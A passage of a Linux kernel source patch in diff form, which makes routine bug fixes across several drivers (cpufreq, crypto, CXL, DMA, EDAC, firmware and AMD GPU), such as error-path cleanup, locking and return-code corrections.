+@@ -590,16 +575,12 @@ static int qcom_cpufreq_hw_cpu_exit(struct cpufreq_policy *policy)
+ {
+ 	struct device *cpu_dev = get_cpu_device(policy->cpu);
+ 	struct qcom_cpufreq_data *data = policy->driver_data;
+-	struct resource *res = data->res;
+-	void __iomem *base = data->base;
+ 
+ 	dev_pm_opp_remove_all_dynamic(cpu_dev);
+ 	dev_pm_opp_of_cpumask_remove_table(policy->related_cpus);
+ 	qcom_cpufreq_hw_lmh_exit(data);
+ 	kfree(policy->freq_table);
+ 	kfree(data);
+-	iounmap(base);
+-	release_mem_region(res->start, resource_size(res));
+ 
+ 	return 0;
+ }
+@@ -718,17 +699,15 @@ static int qcom_cpufreq_hw_driver_probe(struct platform_device *pdev)
+ 	for (i = 0; i < num_domains; i++) {
+ 		struct qcom_cpufreq_data *data = &qcom_cpufreq.data[i];
+ 		struct clk_init_data clk_init = {};
+-		struct resource *res;
+ 		void __iomem *base;
+ 
+-		base = devm_platform_get_and_ioremap_resource(pdev, i, &res);
++		base = devm_platform_ioremap_resource(pdev, i);
+ 		if (IS_ERR(base)) {
+-			dev_err(dev, "Failed to map resource %pR\n", res);
++			dev_err(dev, "Failed to map resource index %d\n", i);
+ 			return PTR_ERR(base);
+ 		}
+ 
+ 		data->base = base;
+-		data->res = res;
+ 
+ 		/* Register CPU clock for each frequency domain */
+ 		clk_init.name = kasprintf(GFP_KERNEL, "qcom_cpufreq%d", i);
+diff --git a/drivers/cpuidle/cpuidle-riscv-sbi.c b/drivers/cpuidle/cpuidle-riscv-sbi.c
+index 05fe2902df9a7..af7320a768d27 100644
+--- a/drivers/cpuidle/cpuidle-riscv-sbi.c
++++ b/drivers/cpuidle/cpuidle-riscv-sbi.c
+@@ -612,7 +612,7 @@ static int __init sbi_cpuidle_init(void)
+ 	 * 2) SBI HSM extension is available
+ 	 */
+ 	if ((sbi_spec_version < sbi_mk_version(0, 3)) ||
+-	    sbi_probe_extension(SBI_EXT_HSM) <= 0) {
++	    !sbi_probe_extension(SBI_EXT_HSM)) {
+ 		pr_info("HSM suspend not available\n");
+ 		return 0;
+ 	}
+diff --git a/drivers/crypto/Kconfig b/drivers/crypto/Kconfig
+index dfb103f81a64b..8d06bc30eadeb 100644
+--- a/drivers/crypto/Kconfig
++++ b/drivers/crypto/Kconfig
+@@ -820,6 +820,7 @@ config CRYPTO_DEV_SA2UL
+ 	select CRYPTO_AES
+ 	select CRYPTO_ALGAPI
+ 	select CRYPTO_AUTHENC
++	select CRYPTO_DES
+ 	select CRYPTO_SHA1
+ 	select CRYPTO_SHA256
+ 	select CRYPTO_SHA512
+diff --git a/drivers/crypto/caam/ctrl.c b/drivers/crypto/caam/ctrl.c
+index 32253a064d0fe..3b79e0d83d40a 100644
+--- a/drivers/crypto/caam/ctrl.c
++++ b/drivers/crypto/caam/ctrl.c
+@@ -284,6 +284,10 @@ static int instantiate_rng(struct device *ctrldev, int state_handle_mask,
+ 		const u32 rdsta_if = RDSTA_IF0 << sh_idx;
+ 		const u32 rdsta_pr = RDSTA_PR0 << sh_idx;
+ 		const u32 rdsta_mask = rdsta_if | rdsta_pr;
++
++		/* Clear the contents before using the descriptor */
++		memset(desc, 0x00, CAAM_CMD_SZ * 7);
++
+ 		/*
+ 		 * If the corresponding bit is set, this state handle
+ 		 * was initialized by somebody else, so it's left alone.
+@@ -327,8 +331,6 @@ static int instantiate_rng(struct device *ctrldev, int state_handle_mask,
+ 		}
+ 
+ 		dev_info(ctrldev, "Instantiated RNG4 SH%d\n", sh_idx);
+-		/* Clear the contents before recreating the descriptor */
+-		memset(desc, 0x00, CAAM_CMD_SZ * 7);
+ 	}
+ 
+ 	kfree(desc);
+diff --git a/drivers/crypto/ccp/sp-pci.c b/drivers/crypto/ccp/sp-pci.c
+index 084d052fddccb..55411b494d69a 100644
+--- a/drivers/crypto/ccp/sp-pci.c
++++ b/drivers/crypto/ccp/sp-pci.c
+@@ -451,9 +451,9 @@ static const struct pci_device_id sp_pci_table[] = {
+ 	{ PCI_VDEVICE(AMD, 0x1468), (kernel_ulong_t)&dev_vdata[2] },
+ 	{ PCI_VDEVICE(AMD, 0x1486), (kernel_ulong_t)&dev_vdata[3] },
+ 	{ PCI_VDEVICE(AMD, 0x15DF), (kernel_ulong_t)&dev_vdata[4] },
+-	{ PCI_VDEVICE(AMD, 0x1649), (kernel_ulong_t)&dev_vdata[4] },
+ 	{ PCI_VDEVICE(AMD, 0x14CA), (kernel_ulong_t)&dev_vdata[5] },
+ 	{ PCI_VDEVICE(AMD, 0x15C7), (kernel_ulong_t)&dev_vdata[6] },
++	{ PCI_VDEVICE(AMD, 0x1649), (kernel_ulong_t)&dev_vdata[6] },
+ 	/* Last entry must be zero */
+ 	{ 0, }
+ };
+diff --git a/drivers/crypto/inside-secure/safexcel.c b/drivers/crypto/inside-secure/safexcel.c
+index ae6110376e21c..eec44ea32a180 100644
+--- a/drivers/crypto/inside-secure/safexcel.c
++++ b/drivers/crypto/inside-secure/safexcel.c
+@@ -1639,19 +1639,23 @@ static int safexcel_probe_generic(void *pdev,
+ 						     &priv->ring[i].rdr);
+ 		if (ret) {
+ 			dev_err(dev, "Failed to initialize rings\n");
+-			return ret;
++			goto err_cleanup_rings;
+ 		}
+ 
+ 		priv->ring[i].rdr_req = devm_kcalloc(dev,
+ 			EIP197_DEFAULT_RING_SIZE,
+ 			sizeof(*priv->ring[i].rdr_req),
+ 			GFP_KERNEL);
+-		if (!priv->ring[i].rdr_req)
+-			return -ENOMEM;
++		if (!priv->ring[i].rdr_req) {
++			ret = -ENOMEM;
++			goto err_cleanup_rings;
++		}
+ 
+ 		ring_irq = devm_kzalloc(dev, sizeof(*ring_irq), GFP_KERNEL);
+-		if (!ring_irq)
+-			return -ENOMEM;
++		if (!ring_irq) {
++			ret = -ENOMEM;
++			goto err_cleanup_rings;
++		}
+ 
+ 		ring_irq->priv = priv;
+ 		ring_irq->ring = i;
+@@ -1665,7 +1669,8 @@ static int safexcel_probe_generic(void *pdev,
+ 						ring_irq);
+ 		if (irq < 0) {
+ 			dev_err(dev, "Failed to get IRQ ID for ring %d\n", i);
+-			return irq;
++			ret = irq;
++			goto err_cleanup_rings;
+ 		}
+ 
+ 		priv->ring[i].irq = irq;
+@@ -1677,8 +1682,10 @@ static int safexcel_probe_generic(void *pdev,
+ 		snprintf(wq_name, 9, "wq_ring%d", i);
+ 		priv->ring[i].workqueue =
+ 			create_singlethread_workqueue(wq_name);
+-		if (!priv->ring[i].workqueue)
+-			return -ENOMEM;
++		if (!priv->ring[i].workqueue) {
++			ret = -ENOMEM;
++			goto err_cleanup_rings;
++		}
+ 
+ 		priv->ring[i].requests = 0;
+ 		priv->ring[i].busy = false;
+@@ -1695,16 +1702,26 @@ static int safexcel_probe_generic(void *pdev,
+ 	ret = safexcel_hw_init(priv);
+ 	if (ret) {
+ 		dev_err(dev, "HW init failed (%d)\n", ret);
+-		return ret;
++		goto err_cleanup_rings;
+ 	}
+ 
+ 	ret = safexcel_register_algorithms(priv);
+ 	if (ret) {
+ 		dev_err(dev, "Failed to register algorithms (%d)\n", ret);
+-		return ret;
++		goto err_cleanup_rings;
+ 	}
+ 
+ 	return 0;
++
++err_cleanup_rings:
++	for (i = 0; i < priv->config.rings; i++) {
++		if (priv->ring[i].irq)
++			irq_set_affinity_hint(priv->ring[i].irq, NULL);
++		if (priv->ring[i].workqueue)
++			destroy_workqueue(priv->ring[i].workqueue);
++	}
++
++	return ret;
+ }
+ 
+ static void safexcel_hw_reset_rings(struct safexcel_crypto_priv *priv)
+diff --git a/drivers/crypto/qat/qat_common/adf_accel_devices.h b/drivers/crypto/qat/qat_common/adf_accel_devices.h
+index 284f5aad3ee0b..7be933d6f0ffa 100644
+--- a/drivers/crypto/qat/qat_common/adf_accel_devices.h
++++ b/drivers/crypto/qat/qat_common/adf_accel_devices.h
+@@ -310,6 +310,7 @@ struct adf_accel_dev {
+ 			u8 pf_compat_ver;
+ 		} vf;
+ 	};
++	struct mutex state_lock; /* protect state of the device */
+ 	bool is_vf;
+ 	u32 accel_id;
+ };
+diff --git a/drivers/crypto/qat/qat_common/adf_common_drv.h b/drivers/crypto/qat/qat_common/adf_common_drv.h
+index 7189265573c08..4bf1fceb7052b 100644
+--- a/drivers/crypto/qat/qat_common/adf_common_drv.h
++++ b/drivers/crypto/qat/qat_common/adf_common_drv.h
+@@ -58,6 +58,9 @@ void adf_dev_stop(struct adf_accel_dev *accel_dev);
+ void adf_dev_shutdown(struct adf_accel_dev *accel_dev);
+ int adf_dev_shutdown_cache_cfg(struct adf_accel_dev *accel_dev);
+ 
++int adf_dev_up(struct adf_accel_dev *accel_dev, bool init_config);
++int adf_dev_down(struct adf_accel_dev *accel_dev, bool cache_config);
++
+ void adf_devmgr_update_class_index(struct adf_hw_device_data *hw_data);
+ void adf_clean_vf_map(bool);
+ 
+diff --git a/drivers/crypto/qat/qat_common/adf_dev_mgr.c b/drivers/crypto/qat/qat_common/adf_dev_mgr.c
+index 4c752eed10fea..86ee36feefad3 100644
+--- a/drivers/crypto/qat/qat_common/adf_dev_mgr.c
++++ b/drivers/crypto/qat/qat_common/adf_dev_mgr.c
+@@ -223,6 +223,7 @@ int adf_devmgr_add_dev(struct adf_accel_dev *accel_dev,
+ 		map->attached = true;
+ 		list_add_tail(&map->list, &vfs_table);
+ 	}
++	mutex_init(&accel_dev->state_lock);
+ unlock:
+ 	mutex_unlock(&table_lock);
+ 	return ret;
+@@ -269,6 +270,7 @@ void adf_devmgr_rm_dev(struct adf_accel_dev *accel_dev,
+ 		}
+ 	}
+ unlock:
++	mutex_destroy(&accel_dev->state_lock);
+ 	list_del(&accel_dev->list);
+ 	mutex_unlock(&table_lock);
+ }
+diff --git a/drivers/crypto/qat/qat_common/adf_init.c b/drivers/crypto/qat/qat_common/adf_init.c
+index cef7bb8ec0073..988cffd0b8338 100644
+--- a/drivers/crypto/qat/qat_common/adf_init.c
++++ b/drivers/crypto/qat/qat_common/adf_init.c
+@@ -400,3 +400,67 @@ int adf_dev_shutdown_cache_cfg(struct adf_accel_dev *accel_dev)
+ 
+ 	return 0;
+ }
++
++int adf_dev_down(struct adf_accel_dev *accel_dev, bool reconfig)
++{
++	int ret = 0;
++
++	if (!accel_dev)
++		return -EINVAL;
++
++	mutex_lock(&accel_dev->state_lock);
++
++	if (!adf_dev_started(accel_dev)) {
++		dev_info(&GET_DEV(accel_dev), "Device qat_dev%d already down\n",
++			 accel_dev->accel_id);
++		ret = -EINVAL;
++		goto out;
++	}
++
++	if (reconfig) {
++		ret = adf_dev_shutdown_cache_cfg(accel_dev);
++		goto out;
++	}
++
++	adf_dev_stop(accel_dev);
++	adf_dev_shutdown(accel_dev);
++
++out:
++	mutex_unlock(&accel_dev->state_lock);
++	return ret;
++}
++EXPORT_SYMBOL_GPL(adf_dev_down);
++
++int adf_dev_up(struct adf_accel_dev *accel_dev, bool config)
++{
++	int ret = 0;
++
++	if (!accel_dev)
++		return -EINVAL;
++
++	mutex_lock(&accel_dev->state_lock);
++
++	if (adf_dev_started(accel_dev)) {
++		dev_info(&GET_DEV(accel_dev), "Device qat_dev%d already up\n",
++			 accel_dev->accel_id);
++		ret = -EALREADY;
++		goto out;
++	}
++
++	if (config && GET_HW_DATA(accel_dev)->dev_config) {
++		ret = GET_HW_DATA(accel_dev)->dev_config(accel_dev);
++		if (unlikely(ret))
++			goto out;
++	}
++
++	ret = adf_dev_init(accel_dev);
++	if (unlikely(ret))
++		goto out;
++
++	ret = adf_dev_start(accel_dev);
++
++out:
++	mutex_unlock(&accel_dev->state_lock);
++	return ret;
++}
++EXPORT_SYMBOL_GPL(adf_dev_up);
+diff --git a/drivers/crypto/qat/qat_common/adf_sysfs.c b/drivers/crypto/qat/qat_common/adf_sysfs.c
+index e8b078e719c20..3eb6611ab1b11 100644
+--- a/drivers/crypto/qat/qat_common/adf_sysfs.c
++++ b/drivers/crypto/qat/qat_common/adf_sysfs.c
+@@ -50,38 +50,21 @@ static ssize_t state_store(struct device *dev, struct device_attribute *attr,
+ 
+ 	switch (ret) {
+ 	case DEV_DOWN:
+-		if (!adf_dev_started(accel_dev)) {
+-			dev_info(dev, "Device qat_dev%d already down\n",
+-				 accel_id);
+-			return -EINVAL;
+-		}
+-
+ 		dev_info(dev, "Stopping device qat_dev%d\n", accel_id);
+ 
+-		ret = adf_dev_shutdown_cache_cfg(accel_dev);
++		ret = adf_dev_down(accel_dev, true);
+ 		if (ret < 0)
+ 			return -EINVAL;
+ 
+ 		break;
+ 	case DEV_UP:
+-		if (adf_dev_started(accel_dev)) {
+-			dev_info(dev, "Device qat_dev%d already up\n",
+-				 accel_id);
+-			return -EINVAL;
+-		}
+-
+ 		dev_info(dev, "Starting device qat_dev%d\n", accel_id);
+ 
+-		ret = GET_HW_DATA(accel_dev)->dev_config(accel_dev);
+-		if (!ret)
+-			ret = adf_dev_init(accel_dev);
+-		if (!ret)
+-			ret = adf_dev_start(accel_dev);
+-
++		ret = adf_dev_up(accel_dev, true);
+ 		if (ret < 0) {
+ 			dev_err(dev, "Failed to start device qat_dev%d\n",
+ 				accel_id);
+-			adf_dev_shutdown_cache_cfg(accel_dev);
++			adf_dev_down(accel_dev, true);
+ 			return ret;
+ 		}
+ 		break;
+diff --git a/drivers/cxl/core/hdm.c b/drivers/cxl/core/hdm.c
+index dcc16d7cb8f37..c6a244d54ff68 100644
+--- a/drivers/cxl/core/hdm.c
++++ b/drivers/cxl/core/hdm.c
+@@ -219,8 +219,11 @@ static int __cxl_dpa_reserve(struct cxl_endpoint_decoder *cxled,
+ 
+ 	lockdep_assert_held_write(&cxl_dpa_rwsem);
+ 
+-	if (!len)
+-		goto success;
++	if (!len) {
++		dev_warn(dev, "decoder%d.%d: empty reservation attempted\n",
++			 port->id, cxled->cxld.id);
++		return -EINVAL;
++	}
+ 
+ 	if (cxled->dpa_res) {
+ 		dev_dbg(dev, "decoder%d.%d: existing allocation %pr assigned\n",
+@@ -273,7 +276,6 @@ static int __cxl_dpa_reserve(struct cxl_endpoint_decoder *cxled,
+ 		cxled->mode = CXL_DECODER_MIXED;
+ 	}
+ 
+-success:
+ 	port->hdm_end++;
+ 	get_device(&cxled->cxld.dev);
+ 	return 0;
+@@ -732,6 +734,13 @@ static int init_hdm_decoder(struct cxl_port *port, struct cxl_decoder *cxld,
+ 				 port->id, cxld->id);
+ 			return -ENXIO;
+ 		}
++
++		if (size == 0) {
++			dev_warn(&port->dev,
++				 "decoder%d.%d: Committed with zero size\n",
++				 port->id, cxld->id);
++			return -ENXIO;
++		}
+ 		port->commit_end = cxld->id;
+ 	} else {
+ 		/* unless / until type-2 drivers arrive, assume type-3 */
+diff --git a/drivers/dma/at_xdmac.c b/drivers/dma/at_xdmac.c
+index d6c9781cd46af..bfc8ae2143957 100644
+--- a/drivers/dma/at_xdmac.c
++++ b/drivers/dma/at_xdmac.c
+@@ -243,6 +243,7 @@ struct at_xdmac {
+ 	int			irq;
+ 	struct clk		*clk;
+ 	u32			save_gim;
++	u32			save_gs;
+ 	struct dma_pool		*at_xdmac_desc_pool;
+ 	const struct at_xdmac_layout	*layout;
+ 	struct at_xdmac_chan	chan[];
+@@ -1988,6 +1989,7 @@ static int __maybe_unused atmel_xdmac_suspend(struct device *dev)
+ 		}
+ 	}
+ 	atxdmac->save_gim = at_xdmac_read(atxdmac, AT_XDMAC_GIM);
++	atxdmac->save_gs = at_xdmac_read(atxdmac, AT_XDMAC_GS);
+ 
+ 	at_xdmac_off(atxdmac);
+ 	clk_disable_unprepare(atxdmac->clk);
+@@ -2027,7 +2029,8 @@ static int __maybe_unused atmel_xdmac_resume(struct device *dev)
+ 			at_xdmac_chan_write(atchan, AT_XDMAC_CNDC, atchan->save_cndc);
+ 			at_xdmac_chan_write(atchan, AT_XDMAC_CIE, atchan->save_cim);
+ 			wmb();
+-			at_xdmac_write(atxdmac, AT_XDMAC_GE, atchan->mask);
++			if (atxdmac->save_gs & atchan->mask)
++				at_xdmac_write(atxdmac, AT_XDMAC_GE, atchan->mask);
+ 		}
+ 	}
+ 	return 0;
+diff --git a/drivers/dma/dw-edma/dw-edma-core.c b/drivers/dma/dw-edma/dw-edma-core.c
+index 52bdf04aff511..ef4cdcf6beba0 100644
+--- a/drivers/dma/dw-edma/dw-edma-core.c
++++ b/drivers/dma/dw-edma/dw-edma-core.c
+@@ -170,7 +170,7 @@ static void vchan_free_desc(struct virt_dma_desc *vdesc)
+ 	dw_edma_free_desc(vd2dw_edma_desc(vdesc));
+ }
+ 
+-static void dw_edma_start_transfer(struct dw_edma_chan *chan)
++static int dw_edma_start_transfer(struct dw_edma_chan *chan)
+ {
+ 	struct dw_edma_chunk *child;
+ 	struct dw_edma_desc *desc;
+@@ -178,16 +178,16 @@ static void dw_edma_start_transfer(struct dw_edma_chan *chan)
+ 
+ 	vd = vchan_next_desc(&chan->vc);
+ 	if (!vd)
+-		return;
++		return 0;
+ 
+ 	desc = vd2dw_edma_desc(vd);
+ 	if (!desc)
+-		return;
++		return 0;
+ 
+ 	child = list_first_entry_or_null(&desc->chunk->list,
+ 					 struct dw_edma_chunk, list);
+ 	if (!child)
+-		return;
++		return 0;
+ 
+ 	dw_edma_v0_core_start(child, !desc->xfer_sz);
+ 	desc->xfer_sz += child->ll_region.sz;
+@@ -195,6 +195,8 @@ static void dw_edma_start_transfer(struct dw_edma_chan *chan)
+ 	list_del(&child->list);
+ 	kfree(child);
+ 	desc->chunks_alloc--;
++
++	return 1;
+ }
+ 
+ static int dw_edma_device_config(struct dma_chan *dchan,
+@@ -277,9 +279,12 @@ static void dw_edma_device_issue_pending(struct dma_chan *dchan)
+ 	struct dw_edma_chan *chan = dchan2dw_edma_chan(dchan);
+ 	unsigned long flags;
+ 
++	if (!chan->configured)
++		return;
++
+ 	spin_lock_irqsave(&chan->vc.lock, flags);
+-	if (chan->configured && chan->request == EDMA_REQ_NONE &&
+-	    chan->status == EDMA_ST_IDLE && vchan_issue_pending(&chan->vc)) {
++	if (vchan_issue_pending(&chan->vc) && chan->request == EDMA_REQ_NONE &&
++	    chan->status == EDMA_ST_IDLE) {
+ 		chan->status = EDMA_ST_BUSY;
+ 		dw_edma_start_transfer(chan);
+ 	}
+@@ -572,14 +577,14 @@ static void dw_edma_done_interrupt(struct dw_edma_chan *chan)
+ 		switch (chan->request) {
+ 		case EDMA_REQ_NONE:
+ 			desc = vd2dw_edma_desc(vd);
+-			if (desc->chunks_alloc) {
+-				chan->status = EDMA_ST_BUSY;
+-				dw_edma_start_transfer(chan);
+-			} else {
++			if (!desc->chunks_alloc) {
+ 				list_del(&vd->node);
+ 				vchan_cookie_complete(vd);
+-				chan->status = EDMA_ST_IDLE;
+ 			}
++
++			/* Continue transferring if there are remaining chunks or issued requests.
++			 */
++			chan->status = dw_edma_start_transfer(chan) ? EDMA_ST_BUSY : EDMA_ST_IDLE;
+ 			break;
+ 
+ 		case EDMA_REQ_STOP:
+diff --git a/drivers/dma/mv_xor_v2.c b/drivers/dma/mv_xor_v2.c
+index 113834e1167b6..d086ff1824f82 100644
+--- a/drivers/dma/mv_xor_v2.c
++++ b/drivers/dma/mv_xor_v2.c
+@@ -755,7 +755,7 @@ static int mv_xor_v2_probe(struct platform_device *pdev)
+ 
+ 	xor_dev->clk = devm_clk_get(&pdev->dev, NULL);
+ 	if (PTR_ERR(xor_dev->clk) == -EPROBE_DEFER) {
+-		ret = EPROBE_DEFER;
++		ret = -EPROBE_DEFER;
+ 		goto disable_reg_clk;
+ 	}
+ 	if (!IS_ERR(xor_dev->clk)) {
+diff --git a/drivers/dma/qcom/gpi.c b/drivers/dma/qcom/gpi.c
+index 59a36cbf9b5f7..932628b319c81 100644
+--- a/drivers/dma/qcom/gpi.c
++++ b/drivers/dma/qcom/gpi.c
+@@ -1966,7 +1966,6 @@ error_alloc_ev_ring:
+ error_config_int:
+ 	gpi_free_ring(&gpii->ev_ring, gpii);
+ exit_gpi_init:
+-	mutex_unlock(&gpii->ctrl_lock);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/edac/skx_base.c b/drivers/edac/skx_base.c
+index 9397abb42c498..0a862336a7ce8 100644
+--- a/drivers/edac/skx_base.c
++++ b/drivers/edac/skx_base.c
+@@ -510,7 +510,7 @@ rir_found:
+ }
+ 
+ static u8 skx_close_row[] = {
+-	15, 16, 17, 18, 20, 21, 22, 28, 10, 11, 12, 13, 29, 30, 31, 32, 33
++	15, 16, 17, 18, 20, 21, 22, 28, 10, 11, 12, 13, 29, 30, 31, 32, 33, 34
+ };
+ 
+ static u8 skx_close_column[] = {
+@@ -518,7 +518,7 @@ static u8 skx_close_column[] = {
+ };
+ 
+ static u8 skx_open_row[] = {
+-	14, 15, 16, 20, 28, 21, 22, 23, 24, 25, 26, 27, 29, 30, 31, 32, 33
++	14, 15, 16, 20, 28, 21, 22, 23, 24, 25, 26, 27, 29, 30, 31, 32, 33, 34
+ };
+ 
+ static u8 skx_open_column[] = {
+diff --git a/drivers/firmware/arm_scmi/driver.c b/drivers/firmware/arm_scmi/driver.c
+index ffdad59ec81fc..fe06dc1936896 100644
+--- a/drivers/firmware/arm_scmi/driver.c
++++ b/drivers/firmware/arm_scmi/driver.c
+@@ -1981,7 +1981,7 @@ static int scmi_xfer_info_init(struct scmi_info *sinfo)
+ 		return ret;
+ 
+ 	ret = __scmi_xfer_info_init(sinfo, &sinfo->tx_minfo);
+-	if (!ret && idr_find(&sinfo->rx_idr, SCMI_PROTOCOL_BASE))
++	if (!ret && !idr_is_empty(&sinfo->rx_idr))
+ 		ret = __scmi_xfer_info_init(sinfo, &sinfo->rx_minfo);
+ 
+ 	return ret;
+diff --git a/drivers/firmware/qcom_scm.c b/drivers/firmware/qcom_scm.c
+index cdbfe54c81467..51eb85354c058 100644
+--- a/drivers/firmware/qcom_scm.c
++++ b/drivers/firmware/qcom_scm.c
+@@ -1418,8 +1418,7 @@ static int qcom_scm_probe(struct platform_device *pdev)
+ static void qcom_scm_shutdown(struct platform_device *pdev)
+ {
+ 	/* Clean shutdown, disable download mode to allow normal restart */
+-	if (download_mode)
+-		qcom_scm_set_download_mode(false);
++	qcom_scm_set_download_mode(false);
+ }
+ 
+ static const struct of_device_id qcom_scm_dt_match[] = {
+diff --git a/drivers/firmware/stratix10-svc.c b/drivers/firmware/stratix10-svc.c
+index bde1f543f5298..80f4e2d14e046 100644
+--- a/drivers/firmware/stratix10-svc.c
++++ b/drivers/firmware/stratix10-svc.c
+@@ -1133,8 +1133,8 @@ static int stratix10_svc_drv_probe(struct platform_device *pdev)
+ 		return ret;
+ 
+ 	genpool = svc_create_memory_pool(pdev, sh_memory);
+-	if (!genpool)
+-		return -ENOMEM;
++	if (IS_ERR(genpool))
++		return PTR_ERR(genpool);
+ 
+ 	/* allocate service controller and supporting channel */
+ 	controller = devm_kzalloc(dev, sizeof(*controller), GFP_KERNEL);
+diff --git a/drivers/fpga/fpga-bridge.c b/drivers/fpga/fpga-bridge.c
+index 13918c8c839ea..833ce13ff6f86 100644
+--- a/drivers/fpga/fpga-bridge.c
++++ b/drivers/fpga/fpga-bridge.c
+@@ -115,7 +115,7 @@ static int fpga_bridge_dev_match(struct device *dev, const void *data)
+ /**
+  * fpga_bridge_get - get an exclusive reference to an fpga bridge
+  * @dev:	parent device that fpga bridge was registered with
+- * @info:	fpga manager info
++ * @info:	fpga image specific information
+  *
+  * Given a device, get an exclusive reference to an fpga bridge.
+  *
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 3dac1e139c5f3..533263d442657 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -35,6 +35,7 @@
+ #include <linux/devcoredump.h>
+ #include <generated/utsrelease.h>
+ #include <linux/pci-p2pdma.h>
++#include <linux/apple-gmux.h>
+ 
+ #include <drm/drm_aperture.h>
+ #include <drm/drm_atomic_helper.h>
+@@ -3952,12 +3953,15 @@ fence_driver_init:
+ 	if ((adev->pdev->class >> 8) == PCI_CLASS_DISPLAY_VGA)
+ 		vga_client_register(adev->pdev, amdgpu_device_vga_set_decode);
+ 
+-	if (amdgpu_device_supports_px(ddev)) {
+-		px = true;
++	px = amdgpu_device_supports_px(ddev);
++
++	if (px || (!pci_is_thunderbolt_attached(adev->pdev) &&
++				apple_gmux_detect(NULL, NULL)))
+ 		vga_switcheroo_register_client(adev->pdev,
+ 					       &amdgpu_switcheroo_ops, px);
++
++	if (px)
+ 		vga_switcheroo_init_domain_pm_ops(adev->dev, &adev->vga_pm_domain);
+-	}
+ 
+ 	if (adev->gmc.xgmi.pending_reset)
+ 		queue_delayed_work(system_wq, &mgpu_info.delayed_reset_work,
+@@ -4063,6 +4067,7 @@ void amdgpu_device_fini_hw(struct amdgpu_device *adev)
+ void amdgpu_device_fini_sw(struct amdgpu_device *adev)
+ {
+ 	int idx;
++	bool px;
+ 
+ 	amdgpu_fence_driver_sw_fini(adev);
+ 	amdgpu_device_ip_fini(adev);
+@@ -4082,10 +4087,16 @@ void amdgpu_device_fini_sw(struct amdgpu_device *adev)
+ 
+ 	kfree(adev->bios);
+ 	adev->bios = NULL;
+-	if (amdgpu_device_supports_px(adev_to_drm(adev))) {
++
++	px = amdgpu_device_supports_px(adev_to_drm(adev));
++
++	if (px || (!pci_is_thunderbolt_attached(adev->pdev) &&
++				apple_gmux_detect(NULL, NULL)))
+ 		vga_switcheroo_unregister_client(adev->pdev);
++
++	if (px)
+ 		vga_switcheroo_fini_domain_pm_ops(adev->dev);
+-	}
++
+ 	if ((adev->pdev->class >> 8) == PCI_CLASS_DISPLAY_VGA)
+ 		vga_client_unregister(adev->pdev);
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 7fa1728384bfd..422909d1f352b 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -1771,7 +1771,8 @@ static void amdgpu_dm_fini(struct amdgpu_device *adev)
+ 		dc_deinit_callbacks(adev->dm.dc);
+ #endif
+ 
+-	dc_dmub_srv_destroy(&adev->dm.dc->ctx->dmub_srv);
++	if (adev->dm.dc)
++		dc_dmub_srv_destroy(&adev->dm.dc->ctx->dmub_srv);
+ 
+ 	if (dc_enable_dmub_notifications(adev->dm.dc)) {
+ 		kfree(adev->dm.dmub_notify);
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c
+index 26291db0a3cf6..872d06fe14364 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c
+@@ -122,6 +122,9 @@ bool amdgpu_dm_link_setup_psr(struct dc_stream_state *stream)
+ 		psr_config.allow_multi_disp_optimizations =
+ 			(amdgpu_dc_feature_mask & DC_PSR_ALLOW_MULTI_DISP_OPT);
+ 
++		if (!psr_su_set_y_granularity(dc, link, stream, &psr_config))
++			return false;
++
+ 		ret = dc_link_setup_psr(link, stream, &psr_config, &psr_context);
+ 
+ 	}
+diff --git a/drivers/gpu/drm/amd/display/dc/dce60/Makefile b/drivers/gpu/drm/amd/display/dc/dce60/Makefile
+index dda596fa1cd76..fee331accc0e7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dce60/Makefile
++++ b/drivers/gpu/drm/amd/display/dc/dce60/Makefile
+@@ -23,7 +23,7 @@
+ # Makefile for the 'controller' sub-component of DAL.
+ # It provides the control and status of HW CRTC block.
+ 
+-CFLAGS_AMDDALPATH)/dc/dce60/dce60_resource.o = $(call cc-disable-warning, override-init)
++CFLAGS_$(AMDDALPATH)/dc/dce60/dce60_resource.o = $(call cc-disable-warning, override-init)
+ 
+ DCE60 = dce60_timing_generator.o dce60_hw_sequencer.o \
+ 	dce60_resource.o
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c
+index c18c52a60100e..c4e206aedf731 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c
+@@ -1648,7 +1648,8 @@ noinline bool dcn30_internal_validate_bw(
+ 		display_e2e_pipe_params_st *pipes,
+ 		int *pipe_cnt_out,
+ 		int *vlevel_out,
+-		bool fast_validate)
++		bool fast_validate,
++		bool allow_self_refresh_only)
+ {
+ 	bool out = false;
+ 	bool repopulate_pipes = false;
+@@ -1675,7 +1676,7 @@ noinline bool dcn30_internal_validate_bw(
+ 
+ 	dml_log_pipe_params(&context->bw_ctx.dml, pipes, pipe_cnt);
+ 
+-	if (!fast_validate) {
++	if (!fast_validate || !allow_self_refresh_only) {
+ 		/*
+ 		 * DML favors voltage over p-state, but we're more interested in
+ 		 * supporting p-state over voltage. We can't support p-state in
+@@ -1688,11 +1689,12 @@ noinline bool dcn30_internal_validate_bw(
+ 		if (vlevel < context->bw_ctx.dml.soc.num_states)
+ 			vlevel = dcn20_validate_apply_pipe_split_flags(dc, context, vlevel, split, merge);
+ 	}
+-	if (fast_validate || vlevel == context->bw_ctx.dml.soc.num_states ||
+-			vba->DRAMClockChangeSupport[vlevel][vba->maxMpcComb] == dm_dram_clock_change_unsupported) {
++	if (allow_self_refresh_only &&
